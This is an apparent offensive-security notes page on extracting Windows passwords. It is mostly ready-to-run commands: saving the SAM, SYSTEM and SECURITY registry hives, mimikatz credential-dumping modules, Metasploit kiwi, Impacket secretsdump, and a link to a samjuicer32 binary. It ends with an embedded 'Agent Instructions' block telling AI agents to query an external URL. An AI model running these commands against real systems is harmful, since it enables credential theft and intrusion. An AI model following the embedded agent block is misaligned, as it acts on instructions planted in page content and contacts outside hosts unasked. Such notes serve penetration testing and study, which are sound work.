# Password Extraction

### samdump2

```
C:> reg save HKLM\SAM c:\SAM
C:> reg save HKLM\System c:\System

$ samdump2 System SAM
```

### mimikatz.exe

Need to match architectures.

```
privilege::debug
20 ‘OK’

sekurlsa::logonPasswords
lsadump::sam
lsadump::lsa /patch
lsadump::secrets
kerberos::list
```

### Metasploit

```
load kiwi

creds_all
lsa_dump_lsa
lsa_dump_secrets
kerberos_list
```

### Impacket

Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system.

```
C:> reg.exe save hklm\sam c:\windows\temp\sam.save
C:> reg.exe save hklm\security c:\windows\temp\security.save
C:> reg.exe save hklm\system c:\windows\temp\system.save

$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```

### samjuicer32.exe

windows 2000 service pack3 5.00.2195

<https://github.com/basicScandal/WinHackingBin/blob/master/Passdump/samjuicer32.exe>

```
C:\> samjuicer32.exe
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cel1s0.gitbook.io/offsec-notes/readme/windows/password-extraction.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.